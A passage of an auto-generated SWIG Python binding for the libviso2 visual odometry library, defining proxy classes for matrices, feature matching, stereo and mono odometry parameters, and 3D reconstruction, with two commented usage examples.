__getattr__ = lambda self, name: _swig_getattr(self, bucketing, name)
__repr__ = _swig_repr
__swig_setmethods__["max_features"] = _viso2.bucketing_max_features_set
__swig_getmethods__["max_features"] = _viso2.bucketing_max_features_get
if _newclass:
max_features = _swig_property(_viso2.bucketing_max_features_get, _viso2.bucketing_max_features_set)
__swig_setmethods__["bucket_width"] = _viso2.bucketing_bucket_width_set
__swig_getmethods__["bucket_width"] = _viso2.bucketing_bucket_width_get
if _newclass:
bucket_width = _swig_property(_viso2.bucketing_bucket_width_get, _viso2.bucketing_bucket_width_set)
__swig_setmethods__["bucket_height"] = _viso2.bucketing_bucket_height_set
__swig_getmethods__["bucket_height"] = _viso2.bucketing_bucket_height_get
if _newclass:
bucket_height = _swig_property(_viso2.bucketing_bucket_height_get, _viso2.bucketing_bucket_height_set)
def __init__(self):
"""__init__(self) -> bucketing"""
this = _viso2.new_bucketing()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_bucketing
__del__ = lambda self: None
bucketing_swigregister = _viso2.bucketing_swigregister
bucketing_swigregister(bucketing)
class VO_parameters(_object):
"""Proxy of C++ VisualOdometry::parameters class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, VO_parameters, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, VO_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["match"] = _viso2.VO_parameters_match_set
__swig_getmethods__["match"] = _viso2.VO_parameters_match_get
if _newclass:
match = _swig_property(_viso2.VO_parameters_match_get, _viso2.VO_parameters_match_set)
__swig_setmethods__["bucket"] = _viso2.VO_parameters_bucket_set
__swig_getmethods__["bucket"] = _viso2.VO_parameters_bucket_get
if _newclass:
bucket = _swig_property(_viso2.VO_parameters_bucket_get, _viso2.VO_parameters_bucket_set)
__swig_setmethods__["calib"] = _viso2.VO_parameters_calib_set
__swig_getmethods__["calib"] = _viso2.VO_parameters_calib_get
if _newclass:
calib = _swig_property(_viso2.VO_parameters_calib_get, _viso2.VO_parameters_calib_set)
def __init__(self):
"""__init__(self) -> VO_parameters"""
this = _viso2.new_VO_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VO_parameters
__del__ = lambda self: None
VO_parameters_swigregister = _viso2.VO_parameters_swigregister
VO_parameters_swigregister(VO_parameters)
class VisualOdometryMono(VisualOdometry):
"""Proxy of C++ VisualOdometryMono class."""
__swig_setmethods__ = {}
for _s in [VisualOdometry]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometryMono, name, value)
__swig_getmethods__ = {}
for _s in [VisualOdometry]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometryMono, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> VisualOdometryMono"""
this = _viso2.new_VisualOdometryMono(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VisualOdometryMono
__del__ = lambda self: None
def process(self, *args):
"""
process(self, I, dims, replace=False) -> bool
process(self, I, dims) -> bool
process(self, I1, I2, dims, replace=False) -> bool
process(self, I1, I2, dims) -> bool
"""
return _viso2.VisualOdometryMono_process(self, *args)
def getInlierMatches(self):
"""getInlierMatches(self) -> MatchVector"""
return _viso2.VisualOdometryMono_getInlierMatches(self)
def process_frame(self, *args):
"""
process_frame(self, image1, replace=False) -> bool
process_frame(self, image1) -> bool
process_frame(self, image1, image2, replace=False) -> bool
process_frame(self, image1, image2) -> bool
"""
return _viso2.VisualOdometryMono_process_frame(self, *args)
VisualOdometryMono_swigregister = _viso2.VisualOdometryMono_swigregister
VisualOdometryMono_swigregister(VisualOdometryMono)
class Mono_parameters(VO_parameters):
"""Proxy of C++ VisualOdometryMono::parameters class."""
__swig_setmethods__ = {}
for _s in [VO_parameters]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, Mono_parameters, name, value)
__swig_getmethods__ = {}
for _s in [VO_parameters]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, Mono_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["height"] = _viso2.Mono_parameters_height_set
__swig_getmethods__["height"] = _viso2.Mono_parameters_height_get
if _newclass:
height = _swig_property(_viso2.Mono_parameters_height_get, _viso2.Mono_parameters_height_set)
__swig_setmethods__["pitch"] = _viso2.Mono_parameters_pitch_set
__swig_getmethods__["pitch"] = _viso2.Mono_parameters_pitch_get
if _newclass:
pitch = _swig_property(_viso2.Mono_parameters_pitch_get, _viso2.Mono_parameters_pitch_set)
__swig_setmethods__["ransac_iters"] = _viso2.Mono_parameters_ransac_iters_set
__swig_getmethods__["ransac_iters"] = _viso2.Mono_parameters_ransac_iters_get
if _newclass:
ransac_iters = _swig_property(_viso2.Mono_parameters_ransac_iters_get, _viso2.Mono_parameters_ransac_iters_set)
__swig_setmethods__["inlier_threshold"] = _viso2.Mono_parameters_inlier_threshold_set
__swig_getmethods__["inlier_threshold"] = _viso2.Mono_parameters_inlier_threshold_get
if _newclass:
inlier_threshold = _swig_property(_viso2.Mono_parameters_inlier_threshold_get, _viso2.Mono_parameters_inlier_threshold_set)
__swig_setmethods__["motion_threshold"] = _viso2.Mono_parameters_motion_threshold_set
__swig_getmethods__["motion_threshold"] = _viso2.Mono_parameters_motion_threshold_get
if _newclass:
motion_threshold = _swig_property(_viso2.Mono_parameters_motion_threshold_get, _viso2.Mono_parameters_motion_threshold_set)
def __init__(self):
"""__init__(self) -> Mono_parameters"""
this = _viso2.new_Mono_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Mono_parameters
__del__ = lambda self: None
Mono_parameters_swigregister = _viso2.Mono_parameters_swigregister
Mono_parameters_swigregister(Mono_parameters)
class VisualOdometryStereo(VisualOdometry):
"""Proxy of C++ VisualOdometryStereo class."""
__swig_setmethods__ = {}
for _s in [VisualOdometry]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometryStereo, name, value)
__swig_getmethods__ = {}
for _s in [VisualOdometry]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometryStereo, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> VisualOdometryStereo"""
this = _viso2.new_VisualOdometryStereo(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VisualOdometryStereo
__del__ = lambda self: None
def process(self, *args):
"""
process(self, I1, I2, dims, replace=False) -> bool
process(self, I1, I2, dims) -> bool
process(self, p_matched_) -> bool
"""
return _viso2.VisualOdometryStereo_process(self, *args)
def process_frame(self, image1, image2, replace=False):
"""
process_frame(self, image1, image2, replace=False) -> bool
process_frame(self, image1, image2) -> bool
"""
return _viso2.VisualOdometryStereo_process_frame(self, image1, image2, replace)
VisualOdometryStereo_swigregister = _viso2.VisualOdometryStereo_swigregister
VisualOdometryStereo_swigregister(VisualOdometryStereo)
class Stereo_parameters(VO_parameters):
"""Proxy of C++ VisualOdometryStereo::parameters class."""
__swig_setmethods__ = {}
for _s in [VO_parameters]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, Stereo_parameters, name, value)
__swig_getmethods__ = {}
for _s in [VO_parameters]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, Stereo_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["base"] = _viso2.Stereo_parameters_base_set
__swig_getmethods__["base"] = _viso2.Stereo_parameters_base_get
if _newclass:
base = _swig_property(_viso2.Stereo_parameters_base_get, _viso2.Stereo_parameters_base_set)
__swig_setmethods__["ransac_iters"] = _viso2.Stereo_parameters_ransac_iters_set
__swig_getmethods__["ransac_iters"] = _viso2.Stereo_parameters_ransac_iters_get
if _newclass:
ransac_iters = _swig_property(_viso2.Stereo_parameters_ransac_iters_get, _viso2.Stereo_parameters_ransac_iters_set)
__swig_setmethods__["inlier_threshold"] = _viso2.Stereo_parameters_inlier_threshold_set
__swig_getmethods__["inlier_threshold"] = _viso2.Stereo_parameters_inlier_threshold_get
if _newclass:
inlier_threshold = _swig_property(_viso2.Stereo_parameters_inlier_threshold_get, _viso2.Stereo_parameters_inlier_threshold_set)
__swig_setmethods__["reweighting"] = _viso2.Stereo_parameters_reweighting_set
__swig_getmethods__["reweighting"] = _viso2.Stereo_parameters_reweighting_get
if _newclass:
reweighting = _swig_property(_viso2.Stereo_parameters_reweighting_get, _viso2.Stereo_parameters_reweighting_set)
def __init__(self):
"""__init__(self) -> Stereo_parameters"""
this = _viso2.new_Stereo_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Stereo_parameters
__del__ = lambda self: None
Stereo_parameters_swigregister = _viso2.Stereo_parameters_swigregister
Stereo_parameters_swigregister(Stereo_parameters)
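# A minimal usage sketch for the stereo wrapper, assuming rectified 8-bit grayscale numpy
# arrays for the left/right frames; the calibration numbers below are placeholders only:
#
#   params = Stereo_parameters()
#   params.calib.f = 645.2          # focal length in pixels
#   params.calib.cu = 635.9         # principal point, u-coordinate
#   params.calib.cv = 194.1         # principal point, v-coordinate
#   params.base = 0.57              # stereo baseline in metres
#   viso = VisualOdometryStereo(params)
#   if viso.process_frame(left_img, right_img):
#       motion = viso.getMotion()   # frame-to-frame transform as a 4x4 Matrix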
class Matrix(_object):
"""Proxy of C++ Matrix class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matrix, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matrix, name)
__repr__ = _swig_repr
def __init__(self, *args):
"""
__init__(self) -> Matrix
__init__(self, m, n) -> Matrix
__init__(self, m, n, val_) -> Matrix
__init__(self, M) -> Matrix
"""
this = _viso2.new_Matrix(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matrix
__del__ = lambda self: None
def assign(self, M):
"""assign(self, M) -> Matrix"""
return _viso2.Matrix_assign(self, M)
def getData(self, val_, i1=0, j1=0, i2=-1, j2=-1):
"""
getData(self, val_, i1=0, j1=0, i2=-1, j2=-1)
getData(self, val_, i1=0, j1=0, i2=-1)
getData(self, val_, i1=0, j1=0)
getData(self, val_, i1=0)
getData(self, val_)
"""
return _viso2.Matrix_getData(self, val_, i1, j1, i2, j2)
def getMat(self, i1, j1, i2=-1, j2=-1):
"""
getMat(self, i1, j1, i2=-1, j2=-1) -> Matrix
getMat(self, i1, j1, i2=-1) -> Matrix
getMat(self, i1, j1) -> Matrix
"""
return _viso2.Matrix_getMat(self, i1, j1, i2, j2)
def setMat(self, M, i, j):
"""setMat(self, M, i, j)"""
return _viso2.Matrix_setMat(self, M, i, j)
def setVal(self, s, i1=0, j1=0, i2=-1, j2=-1):
"""
setVal(self, s, i1=0, j1=0, i2=-1, j2=-1)
setVal(self, s, i1=0, j1=0, i2=-1)
setVal(self, s, i1=0, j1=0)
setVal(self, s, i1=0)
setVal(self, s)
"""
return _viso2.Matrix_setVal(self, s, i1, j1, i2, j2)
def setDiag(self, s, i1=0, i2=-1):
"""
setDiag(self, s, i1=0, i2=-1)
setDiag(self, s, i1=0)
setDiag(self, s)
"""
return _viso2.Matrix_setDiag(self, s, i1, i2)
def zero(self):
"""zero(self)"""
return _viso2.Matrix_zero(self)
def extractCols(self, idx):
"""extractCols(self, idx) -> Matrix"""
return _viso2.Matrix_extractCols(self, idx)
def eye(m):
"""eye(m) -> Matrix"""
return _viso2.Matrix_eye(m)
eye = staticmethod(eye)
def identity(self):
"""identity(self)"""
return _viso2.Matrix_identity(self)
def diag(M):
"""diag(M) -> Matrix"""
return _viso2.Matrix_diag(M)
diag = staticmethod(diag)
def reshape(M, m, n):
"""reshape(M, m, n) -> Matrix"""
return _viso2.Matrix_reshape(M, m, n)
reshape = staticmethod(reshape)
def rotMatX(angle):
"""rotMatX(angle) -> Matrix"""
return _viso2.Matrix_rotMatX(angle)
rotMatX = staticmethod(rotMatX)
def rotMatY(angle):
"""rotMatY(angle) -> Matrix"""
return _viso2.Matrix_rotMatY(angle)
rotMatY = staticmethod(rotMatY)
def rotMatZ(angle):
"""rotMatZ(angle) -> Matrix"""
return _viso2.Matrix_rotMatZ(angle)
rotMatZ = staticmethod(rotMatZ)
def __add__(self, M):
"""__add__(self, M) -> Matrix"""
return _viso2.Matrix___add__(self, M)
def __sub__(self, M):
"""__sub__(self, M) -> Matrix"""
return _viso2.Matrix___sub__(self, M)
def __mul__(self, *args):
"""
__mul__(self, M) -> Matrix
__mul__(self, s) -> Matrix
"""
return _viso2.Matrix___mul__(self, *args)
def __truediv__(self, *args):
return _viso2.Matrix___truediv__(self, *args)
__div__ = __truediv__
def __neg__(self):
"""__neg__(self) -> Matrix"""
return _viso2.Matrix___neg__(self)
def __invert__(self):
"""__invert__(self) -> Matrix"""
return _viso2.Matrix___invert__(self)
def l2norm(self):
"""l2norm(self) -> FLOAT"""
return _viso2.Matrix_l2norm(self)
def mean(self):
"""mean(self) -> FLOAT"""
return _viso2.Matrix_mean(self)
def cross(a, b):
"""cross(a, b) -> Matrix"""
return _viso2.Matrix_cross(a, b)
cross = staticmethod(cross)
def inv(M):
"""inv(M) -> Matrix"""
return _viso2.Matrix_inv(M)
inv = staticmethod(inv)
def setInverse(self):
"""setInverse(self) -> bool"""
return _viso2.Matrix_setInverse(self)
def det(self):
"""det(self) -> FLOAT"""
return _viso2.Matrix_det(self)
def solve(self, M, eps=1e-20):
"""
solve(self, M, eps=1e-20) -> bool
solve(self, M) -> bool
"""
return _viso2.Matrix_solve(self, M, eps)
def lu(self, idx, d, eps=1e-20):
"""
lu(self, idx, d, eps=1e-20) -> bool
lu(self, idx, d) -> bool
"""
return _viso2.Matrix_lu(self, idx, d, eps)
def svd(self, U, W, V):
"""svd(self, U, W, V)"""
return _viso2.Matrix_svd(self, U, W, V)
__swig_setmethods__["val"] = _viso2.Matrix_val_set
__swig_getmethods__["val"] = _viso2.Matrix_val_get
if _newclass:
val = _swig_property(_viso2.Matrix_val_get, _viso2.Matrix_val_set)
__swig_setmethods__["m"] = _viso2.Matrix_m_set
__swig_getmethods__["m"] = _viso2.Matrix_m_get
if _newclass:
m = _swig_property(_viso2.Matrix_m_get, _viso2.Matrix_m_set)
__swig_setmethods__["n"] = _viso2.Matrix_n_set
__swig_getmethods__["n"] = _viso2.Matrix_n_get
if _newclass:
n = _swig_property(_viso2.Matrix_n_get, _viso2.Matrix_n_set)
def __str__(self):
"""__str__(self) -> std::string"""
return _viso2.Matrix___str__(self)
def toNumpy(self, mat):
"""toNumpy(self, mat)"""
return _viso2.Matrix_toNumpy(self, mat)
Matrix_swigregister = _viso2.Matrix_swigregister
Matrix_swigregister(Matrix)
def Matrix_eye(m):
"""Matrix_eye(m) -> Matrix"""
return _viso2.Matrix_eye(m)
def Matrix_diag(M):
"""Matrix_diag(M) -> Matrix"""
return _viso2.Matrix_diag(M)
def Matrix_reshape(M, m, n):
"""Matrix_reshape(M, m, n) -> Matrix"""
return _viso2.Matrix_reshape(M, m, n)
def Matrix_rotMatX(angle):
"""Matrix_rotMatX(angle) -> Matrix"""
return _viso2.Matrix_rotMatX(angle)
def Matrix_rotMatY(angle):
"""Matrix_rotMatY(angle) -> Matrix"""
return _viso2.Matrix_rotMatY(angle)
def Matrix_rotMatZ(angle):
"""Matrix_rotMatZ(angle) -> Matrix"""
return _viso2.Matrix_rotMatZ(angle)
def Matrix_cross(a, b):
"""Matrix_cross(a, b) -> Matrix"""
return _viso2.Matrix_cross(a, b)
def Matrix_inv(M):
"""Matrix_inv(M) -> Matrix"""
return _viso2.Matrix_inv(M)
class Matcher(_object):
"""Proxy of C++ Matcher class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matcher, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matcher, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> Matcher"""
this = _viso2.new_Matcher(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matcher
__del__ = lambda self: None
def setIntrinsics(self, f, cu, cv, base):
"""setIntrinsics(self, f, cu, cv, base)"""
return _viso2.Matcher_setIntrinsics(self, f, cu, cv, base)
def matchFeatures(self, method, Tr_delta=None):
"""
matchFeatures(self, method, Tr_delta=None)
matchFeatures(self, method)
"""
return _viso2.Matcher_matchFeatures(self, method, Tr_delta)
def bucketFeatures(self, max_features, bucket_width, bucket_height):
"""bucketFeatures(self, max_features, bucket_width, bucket_height)"""
return _viso2.Matcher_bucketFeatures(self, max_features, bucket_width, bucket_height)
def getMatches(self):
"""getMatches(self) -> MatchVector"""
return _viso2.Matcher_getMatches(self)
def getGain(self, inliers):
"""getGain(self, inliers) -> float"""
return _viso2.Matcher_getGain(self, inliers)
def pushBack(self, *args):
"""
pushBack(self, I1, I2, dims, replace)
pushBack(self, I1, dims, replace)
pushBack(self, image1, image2, replace=False)
pushBack(self, image1, image2)
pushBack(self, image1, replace=False)
pushBack(self, image1)
"""
return _viso2.Matcher_pushBack(self, *args)
Matcher_swigregister = _viso2.Matcher_swigregister
Matcher_swigregister(Matcher)
class Matcher_parameters(_object):
"""Proxy of C++ Matcher::parameters class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matcher_parameters, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matcher_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["nms_n"] = _viso2.Matcher_parameters_nms_n_set
__swig_getmethods__["nms_n"] = _viso2.Matcher_parameters_nms_n_get
if _newclass:
nms_n = _swig_property(_viso2.Matcher_parameters_nms_n_get, _viso2.Matcher_parameters_nms_n_set)
__swig_setmethods__["nms_tau"] = _viso2.Matcher_parameters_nms_tau_set
__swig_getmethods__["nms_tau"] = _viso2.Matcher_parameters_nms_tau_get
if _newclass:
nms_tau = _swig_property(_viso2.Matcher_parameters_nms_tau_get, _viso2.Matcher_parameters_nms_tau_set)
__swig_setmethods__["match_binsize"] = _viso2.Matcher_parameters_match_binsize_set
__swig_getmethods__["match_binsize"] = _viso2.Matcher_parameters_match_binsize_get
if _newclass:
match_binsize = _swig_property(_viso2.Matcher_parameters_match_binsize_get, _viso2.Matcher_parameters_match_binsize_set)
__swig_setmethods__["match_radius"] = _viso2.Matcher_parameters_match_radius_set
__swig_getmethods__["match_radius"] = _viso2.Matcher_parameters_match_radius_get
if _newclass:
match_radius = _swig_property(_viso2.Matcher_parameters_match_radius_get, _viso2.Matcher_parameters_match_radius_set)
__swig_setmethods__["match_disp_tolerance"] = _viso2.Matcher_parameters_match_disp_tolerance_set
__swig_getmethods__["match_disp_tolerance"] = _viso2.Matcher_parameters_match_disp_tolerance_get
if _newclass:
match_disp_tolerance = _swig_property(_viso2.Matcher_parameters_match_disp_tolerance_get, _viso2.Matcher_parameters_match_disp_tolerance_set)
__swig_setmethods__["outlier_disp_tolerance"] = _viso2.Matcher_parameters_outlier_disp_tolerance_set
__swig_getmethods__["outlier_disp_tolerance"] = _viso2.Matcher_parameters_outlier_disp_tolerance_get
if _newclass:
outlier_disp_tolerance = _swig_property(_viso2.Matcher_parameters_outlier_disp_tolerance_get, _viso2.Matcher_parameters_outlier_disp_tolerance_set)
__swig_setmethods__["outlier_flow_tolerance"] = _viso2.Matcher_parameters_outlier_flow_tolerance_set
__swig_getmethods__["outlier_flow_tolerance"] = _viso2.Matcher_parameters_outlier_flow_tolerance_get
if _newclass:
outlier_flow_tolerance = _swig_property(_viso2.Matcher_parameters_outlier_flow_tolerance_get, _viso2.Matcher_parameters_outlier_flow_tolerance_set)
__swig_setmethods__["multi_stage"] = _viso2.Matcher_parameters_multi_stage_set
__swig_getmethods__["multi_stage"] = _viso2.Matcher_parameters_multi_stage_get
if _newclass:
multi_stage = _swig_property(_viso2.Matcher_parameters_multi_stage_get, _viso2.Matcher_parameters_multi_stage_set)
__swig_setmethods__["half_resolution"] = _viso2.Matcher_parameters_half_resolution_set
__swig_getmethods__["half_resolution"] = _viso2.Matcher_parameters_half_resolution_get
if _newclass:
half_resolution = _swig_property(_viso2.Matcher_parameters_half_resolution_get, _viso2.Matcher_parameters_half_resolution_set)
__swig_setmethods__["refinement"] = _viso2.Matcher_parameters_refinement_set
__swig_getmethods__["refinement"] = _viso2.Matcher_parameters_refinement_get
if _newclass:
refinement = _swig_property(_viso2.Matcher_parameters_refinement_get, _viso2.Matcher_parameters_refinement_set)
__swig_setmethods__["f"] = _viso2.Matcher_parameters_f_set
__swig_getmethods__["f"] = _viso2.Matcher_parameters_f_get
if _newclass:
f = _swig_property(_viso2.Matcher_parameters_f_get, _viso2.Matcher_parameters_f_set)
__swig_setmethods__["cu"] = _viso2.Matcher_parameters_cu_set
__swig_getmethods__["cu"] = _viso2.Matcher_parameters_cu_get
if _newclass:
cu = _swig_property(_viso2.Matcher_parameters_cu_get, _viso2.Matcher_parameters_cu_set)
__swig_setmethods__["cv"] = _viso2.Matcher_parameters_cv_set
__swig_getmethods__["cv"] = _viso2.Matcher_parameters_cv_get
if _newclass:
cv = _swig_property(_viso2.Matcher_parameters_cv_get, _viso2.Matcher_parameters_cv_set)
__swig_setmethods__["base"] = _viso2.Matcher_parameters_base_set
__swig_getmethods__["base"] = _viso2.Matcher_parameters_base_get
if _newclass:
base = _swig_property(_viso2.Matcher_parameters_base_get, _viso2.Matcher_parameters_base_set)
def __init__(self):
"""__init__(self) -> Matcher_parameters"""
this = _viso2.new_Matcher_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matcher_parameters
__del__ = lambda self: None
Matcher_parameters_swigregister = _viso2.Matcher_parameters_swigregister
Matcher_parameters_swigregister(Matcher_parameters)
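# A minimal matcher-only sketch; the meaning of the `method` argument
# (0 = flow, 1 = stereo, 2 = quad matching) is assumed from libviso2's matcher.h:
#
#   mparams = Matcher_parameters()
#   matcher = Matcher(mparams)
#   matcher.pushBack(left_prev, right_prev)
#   matcher.pushBack(left_curr, right_curr)
#   matcher.matchFeatures(2)
#   matches = matcher.getMatches()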
class p_match(_object):
"""Proxy of C++ Matcher::p_match class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, p_match, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, p_match, name)
__repr__ = _swig_repr
__swig_setmethods__["u1p"] = _viso2.p_match_u1p_set
__swig_getmethods__["u1p"] = _viso2.p_match_u1p_get
if _newclass:
u1p = _swig_property(_viso2.p_match_u1p_get, _viso2.p_match_u1p_set)
__swig_setmethods__["v1p"] = _viso2.p_match_v1p_set
__swig_getmethods__["v1p"] = _viso2.p_match_v1p_get
if _newclass:
v1p = _swig_property(_viso2.p_match_v1p_get, _viso2.p_match_v1p_set)
__swig_setmethods__["i1p"] = _viso2.p_match_i1p_set
__swig_getmethods__["i1p"] = _viso2.p_match_i1p_get
if _newclass:
i1p = _swig_property(_viso2.p_match_i1p_get, _viso2.p_match_i1p_set)
__swig_setmethods__["u2p"] = _viso2.p_match_u2p_set
__swig_getmethods__["u2p"] = _viso2.p_match_u2p_get
if _newclass:
u2p = _swig_property(_viso2.p_match_u2p_get, _viso2.p_match_u2p_set)
__swig_setmethods__["v2p"] = _viso2.p_match_v2p_set
__swig_getmethods__["v2p"] = _viso2.p_match_v2p_get
if _newclass:
v2p = _swig_property(_viso2.p_match_v2p_get, _viso2.p_match_v2p_set)
__swig_setmethods__["i2p"] = _viso2.p_match_i2p_set
__swig_getmethods__["i2p"] = _viso2.p_match_i2p_get
if _newclass:
i2p = _swig_property(_viso2.p_match_i2p_get, _viso2.p_match_i2p_set)
__swig_setmethods__["u1c"] = _viso2.p_match_u1c_set
__swig_getmethods__["u1c"] = _viso2.p_match_u1c_get
if _newclass:
u1c = _swig_property(_viso2.p_match_u1c_get, _viso2.p_match_u1c_set)
__swig_setmethods__["v1c"] = _viso2.p_match_v1c_set
__swig_getmethods__["v1c"] = _viso2.p_match_v1c_get
if _newclass:
v1c = _swig_property(_viso2.p_match_v1c_get, _viso2.p_match_v1c_set)
__swig_setmethods__["i1c"] = _viso2.p_match_i1c_set
__swig_getmethods__["i1c"] = _viso2.p_match_i1c_get
if _newclass:
i1c = _swig_property(_viso2.p_match_i1c_get, _viso2.p_match_i1c_set)
__swig_setmethods__["u2c"] = _viso2.p_match_u2c_set
__swig_getmethods__["u2c"] = _viso2.p_match_u2c_get
if _newclass:
u2c = _swig_property(_viso2.p_match_u2c_get, _viso2.p_match_u2c_set)
__swig_setmethods__["v2c"] = _viso2.p_match_v2c_set
__swig_getmethods__["v2c"] = _viso2.p_match_v2c_get
if _newclass:
v2c = _swig_property(_viso2.p_match_v2c_get, _viso2.p_match_v2c_set)
__swig_setmethods__["i2c"] = _viso2.p_match_i2c_set
__swig_getmethods__["i2c"] = _viso2.p_match_i2c_get
if _newclass:
i2c = _swig_property(_viso2.p_match_i2c_get, _viso2.p_match_i2c_set)
def __init__(self, *args):
"""
__init__(self) -> p_match
__init__(self, u1p, v1p, i1p, u2p, v2p, i2p, u1c, v1c, i1c, u2c, v2c, i2c) -> p_match
"""
this = _viso2.new_p_match(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_p_match
__del__ = lambda self: None
p_match_swigregister = _viso2.p_match_swigregister
p_match_swigregister(p_match)
class Reconstruction(_object):
"""Proxy of C++ Reconstruction class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Reconstruction, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Reconstruction, name)
__repr__ = _swig_repr
def __init__(self):
"""__init__(self) -> Reconstruction"""
this = _viso2.new_Reconstruction()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Reconstruction
__del__ = lambda self: None
def setCalibration(self, f, cu, cv):
"""setCalibration(self, f, cu, cv)"""
return _viso2.Reconstruction_setCalibration(self, f, cu, cv)
def update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30, min_angle=2):
"""
update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30, min_angle=2)
update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30)
update(self, p_matched, Tr, point_type=1, min_track_length=2)
update(self, p_matched, Tr, point_type=1)
update(self, p_matched, Tr)
"""
return _viso2.Reconstruction_update(self, p_matched, Tr, point_type, min_track_length, max_dist, min_angle)
def getPoints(self):
"""getPoints(self) -> Point3dVector"""
return _viso2.Reconstruction_getPoints(self)
def getTracks(self):
"""getTracks(self) -> TrackVector"""
return _viso2.Reconstruction_getTracks(self)
Reconstruction_swigregister = _viso2.Reconstruction_swigregister
Reconstruction_swigregister(Reconstruction)
class point3d(_object):
"""Proxy of C++ Reconstruction::point3d class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, point3d, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, point3d, name)
__repr__ = _swig_repr
__swig_setmethods__["x"] = _viso2.point3d_x_set
__swig_getmethods__["x"] = _viso2.point3d_x_get
if _newclass:
x = _swig_property(_viso2.point3d_x_get, _viso2.point3d_x_set)
__swig_setmethods__["y"] = _viso2.point3d_y_set
__swig_getmethods__["y"] = _viso2.point3d_y_get
if _newclass:
y = _swig_property(_viso2.point3d_y_get, _viso2.point3d_y_set)
__swig_setmethods__["z"] = _viso2.point3d_z_set
__swig_getmethods__["z"] = _viso2.point3d_z_get
if _newclass:
z = _swig_property(_viso2.point3d_z_get, _viso2.point3d_z_set)
def __init__(self, *args):
"""
__init__(self) -> point3d
__init__(self, x, y, z) -> point3d
"""
this = _viso2.new_point3d(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_point3d
__del__ = lambda self: None
point3d_swigregister = _viso2.point3d_swigregister
point3d_swigregister(point3d)
class point2d(_object):
"""Proxy of C++ Reconstruction::point2d class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, point2d, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, point2d, name)
__repr__ = _swig_repr
__swig_setmethods__["u"] = _viso2.point2d_u_set
__swig_getmethods__["u"] = _viso2.point2d_u_get
if _newclass:
u = _swig_property(_viso2.point2d_u_get, _viso2.point2d_u_set)
__swig_setmethods__["v"] = _viso2.point2d_v_set
__swig_getmethods__["v"] = _viso2.point2d_v_get
if _newclass:
v = _swig_property(_viso2.point2d_v_get, _viso2.point2d_v_set)
def __init__(self, *args):
"""
__init__(self) -> point2d
__init__(self, u, v) -> point2d
"""
this = _viso2.new_point2d(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_point2d
__del__ = lambda self: None
point2d_swigregister = _viso2.point2d_swigregister
point2d_swigregister(point2d)
class track(_object):
"""Proxy of C++ Reconstruction::track class."""
__swig_setmethods__ = {}
